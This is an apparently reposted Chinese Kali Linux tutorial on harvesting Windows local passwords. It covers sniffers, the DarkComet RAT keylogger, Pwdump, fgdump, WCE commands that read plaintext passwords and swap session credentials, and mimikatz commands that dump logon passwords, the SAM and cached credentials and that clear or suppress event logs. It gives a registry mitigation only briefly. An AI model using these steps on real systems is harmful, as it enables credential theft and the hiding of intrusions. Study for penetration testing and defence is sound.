【kali】28 提权——读取windows本地密码:pwddump、WCE、fgdump、mimikatz

一、 抓包嗅探

Windows

Wireshark
Omnipeek (好多的分析功能
Commview
Sniffpass:抓取密码相关的数据包

Linux

Tcpdump
Wireshark
Dsniff:抓取密码相关的数据包

二、 键盘记录本地密码

可以使用木马软件 DarkCometRAT

在控制目标主机之后可以监控键盘记录信息

三、 查看本地缓存密码

1. 浏览器查看密码

2. 密码恢复工具

3. 使用 Pwdump 查看 windows 本地登录密码

  • windows 登录密码保存在 C:\Windows\System32\config\SAM 文件中

  • Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/

在这里插入图片描述

在这里插入图片描述
登录windows时不保存密码的,不以明文的方式,哈希值,以哈希计算的方式进行比较
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
默认administrator 500

  • 可以将结果保存在文件中,然后在 kali 中进行破解
  • 在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

4. 了解windows身份认证过程

在这里插入图片描述

在这里插入图片描述

  • 发起请求 包含用户名,不会被加密
  • 服务器响应给客户 C 是一个随机数
  • 客户端将C进行哈希计算 生成R
  • R返回给服务端
  • SAM数据库中的值和R进行比对
  • 远程登录,由远程登录安全包进行处理
  • 大部分 安全包都以密文存储
  • W摘要 (安全包)在内存中维护一个明文形式的密码——

在这里插入图片描述

5. WCE (WINDOWS CREDENTIAL EDITOR)

  • 从kali中拷贝文件到物理机——物理机允许此条威胁
  • 新建用户net user a a /add
  • 每隔5秒刷新一次wce-universal.exe -r
  • 删除登录会话wce-universal.exe -d 0020B19D
  • 计算密码对应的 HASH 值wce-universal.exe -g passwd
  • 读取内核中的明文密码wce-universal.exe -w

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

读取内核中的明文密码wce-universal.exe -w

当前内核中保存的值会在下次登录被读取出来
在这里插入图片描述

对 LUID 进行修改(将LUID改为匹配其他用户的用户名和密码)

wce-universal.exe -i luid -s 要修改成的会话
# 把b的会话 改成grb的
wce-universal.exe -i 0008CA88 -s grb:WINXP-1:84384BC3A6782EFD3B435B51404EE:354E325DD1C1CB795A6043750BAC2

Win7 及 之前默认 都可遭受 WCE 攻击

默认会启动包
防范方法:修改注册表

tspkg 终端服务,远程登陆时进行身份验证
wdigest 本体登陆时身份验证

# 启动
regedit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

在这里插入图片描述

6. fgdump

位置
在这里插入图片描述
放在 WinXP 中, 双击或在命令行执行 fgdump.exe 会自动生成三个文件,文件中保存着密码
在这里插入图片描述

7. mimikatz

在这里插入图片描述
在这里插入图片描述

# 查看帮助
::
  C:\Win32>mimikatz.exe
  查看帮助是::
  mimikatz # ::
  	        standard  -  Standard module  [Basic commands (does not require module name)]
  	          crypto  -  Crypto Module
  	        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
  	        kerberos  -  Kerberos package module  []
  	       privilege  -  Privilege module
  	         process  -  Process module
  	         service  -  Service module
  	         lsadump  -  LsaDump module
  	              ts  -  Terminal Server module
  	           event  -  Event module
  	            misc  -  Miscellaneous module
  	           token  -  Token manipulation module
  	           vault  -  Windows Vault/Credential module
  	     minesweeper  -  MineSweeper module
  	             net  -
  	           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
  	       busylight  -  BusyLight Module
  	          sysenv  -  System Environment Value module
  	             sid  -  Security Identifiers module
  	             iis  -  IIS XML Config module
  	             rpc  -  RPC control of mimikatz			
  mimikatz # privilege::
  			Module :        privilege
  			Full name :     Privilege module
  	
  	           debug  -  Ask debug privilege            * *
  	          driver  -  Ask load driver privilege
  	        security  -  Ask security privilege
  	             tcb  -  Ask tcb privilege
  	          backup  -  Ask backup privilege
  	         restore  -  Ask restore privilege
  	          sysenv  -  Ask system environment privilege
  	              id  -  Ask a privilege by its id
  	            name  -  Ask a privilege by its name
# 提升权限
  mimikatz # privilege::debug
  mimikatz # sekurlsa::
# 查看密码 登陆状态的所有密码
  mimikatz # sekurlsa::logonPasswords
  mimikatz # sekurlsa::wdigest
# 进程
  mimikatz # process::list
# 
  mimikatz # lsadump::sam
  mimikatz # lsadump::cache
# 终端服务
  mimikatz # ts::multirdp
# 清楚日志信息/drop之后的行为不会被记录
  mimikatz # event::clear
  mimikatz # event::drop

  mimikatz # misc::regedit
  mimikatz # token::whoami

在这里插入图片描述

おすすめ

転載: blog.csdn.net/grb819/article/details/120912364